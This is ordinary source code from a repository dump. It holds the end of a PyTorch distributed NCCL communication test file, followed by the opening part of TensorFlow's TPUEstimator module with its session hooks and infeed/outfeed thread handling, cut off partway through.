process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
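# Illustrative sketch (an assumption, not part of the tests): code relying on the
# behavior verified above uses the same recipe -- set NCCL_BLOCKING_WAIT before
# the process group is constructed so that wait() raises instead of hanging.
def _example_blocking_wait_group(store, rank, world_size):
    os.environ["NCCL_BLOCKING_WAIT"] = "1"
    # Collectives issued on this group raise RuntimeError on timeout.
    return c10d.ProcessGroupNCCL(
        store, rank, world_size, timeout=timedelta(seconds=30)
    )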
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are identical to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# Test that the process group was constructed with a high priority stream.
self.assertTrue(pg.options.is_high_priority_stream)
# Test that the process group works as expected.
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
tpu_estimator.py
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# The Estimator evaluation loop increases the eval step by 1 per run by default,
# so we add the remaining difference here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
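# Example: with iterations_per_loop == 100, the Estimator evaluation loop's own
# increment of 1 plus the assign_add of 99 above advances the eval step by 100
# for each `Session.run`.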
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(
collections.namedtuple('TPUEstimatorSpec', [
'mode',
'predictions',
'loss',
'train_op',
'eval_metrics',
'export_outputs',
'scaffold_fn',
'host_call'
])):
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function returns a list of Tensors. `host_call`
currently works for train() and evaluate(). The Tensors returned by the
function are executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=hooks,
evaluation_hooks=hooks,
prediction_hooks=hooks)
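# Illustrative sketch (an assumption, following the class docstring above): a
# model_fn that wires per-shard tensors into a CPU-side metric_fn. The names
# below and the use of `tf.metrics` (not imported in this module) are
# hypothetical.
#
#   def _example_metric_fn(labels, logits):
#     # Runs on the CPU host on concatenated, batch-major tensors.
#     predictions = math_ops.argmax(logits, axis=-1)
#     return {'accuracy': tf.metrics.accuracy(labels, predictions)}
#
#   def _example_model_fn(features, labels, mode, params):
#     logits = ...  # build the model
#     loss = ...    # compute the loss
#     return TPUEstimatorSpec(
#         mode=mode,
#         loss=loss,
#         eval_metrics=(_example_metric_fn, [labels, logits]))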
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.' % self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._session_cancel_timer = None
self._feed_error = None
self._finished = False
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _log_error(self, session, error):
"""Log an infeed or outfeed error.
This logs a short error message immediately, and schedules a timer to
emit the full stack trace and error message after a short period of time.
If the main session has terminated by the time the timer triggers, we
assume the real source of the error was from the main session and avoid
emitting a stack trace for the infeed.
Args:
session: `tf.Session`, the session to be terminated.
error: the exception that triggered the logging.
"""
logging.warning(
'\n\n'
'Error occurred during infeed/outfeed. This may be due to a compile '
'error in the main session. Waiting for a short time for the main '
'session to come back.\n\n%s', error)
self._feed_error = traceback.format_exc()
# If we've already encountered a feed error, don't schedule another
# cancellation op.
if self._session_cancel_timer:
return
def _cancel_session():
# Close the session to avoid the main thread from hanging. If input
# pipeline triggers any error, the infeed thread dies but the main thread
# for TPU computation waits for the infeed enqueue forever. Close the
# Session to cancel the main thread Session.run execution.
#
# We sleep for a few seconds before closing to give some time
# for the TPU compilation error, if any, to propagate from TPU to CPU
# host. Compilation errors should be reported by the main thread so that
# the program can be interrupted and users can take action. Due to a race
# condition, the infeed thread might see an error first. Closing the
# session here immediately would result in a session cancellation
# exception in the main thread, instead of the expected compile error.
# User code that depends on having the proper exception type will
# therefore be confused.
time.sleep(5)
# If the main session is still running, the infeed/outfeed errors are
# legitimate, and should be logged.
if not self._finished and self._feed_error:
logging.error('Feed error: %s', self._feed_error)
logging.error('Closing session. A RuntimeError should follow.')
session.close()
self._session_cancel_timer = threading.Thread(target=_cancel_session)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep.')
try:
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
try:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
logging.info('Start infeed thread controller')
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
logging.info('Start outfeed thread controller')
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
def before_run(self, run_context):
self._feed_error = None
# Wait for the cancellation timer to complete before continuing.
if self._session_cancel_timer:
self._session_cancel_timer.join()
self._session_cancel_timer = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
if self._session_cancel_timer:
logging.warning('Feed error occurred; waiting for message.')
self._session_cancel_timer.join()
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
logging.info('Stop outfeed thread controller')
self._outfeed_controller.join()
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to `session_run_hook._StopAfterNEvalsHook`, with the
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
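# Example: with last_step == 1000, a current global_step of 950 and
# iterations == 100, _next_iterations returns min(50, 100) == 50, so the final
# training loop runs only the remaining 50 iterations before requesting stop.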
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model. But it makes the
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately.
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
inputs = _Inputs.from_input_fn(input_fn())
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
# TODO(ylc): Refactoring the code to merge the tpu ordinal logic here and the
# _TPUContext.tpu_ordinal_function. We should either introduce another
# abstraction or a different helper method.
def _tpu_ordinal_function_impl(shard_index_in_host):
# We put both enqueue/dequeue op at tpu.core(0) in each replica.
replica = ctx.device_assignment.lookup_replicas(
host_id, (0, 0, 0))[shard_index_in_host]
return ctx.device_assignment.tpu_ordinal(replica=replica)
if ctx.model_parallelism_enabled:
tpu_ordinal_function = _tpu_ordinal_function_impl
else:
tpu_ordinal_function = None
def enqueue_ops_fn():
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels, signals)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
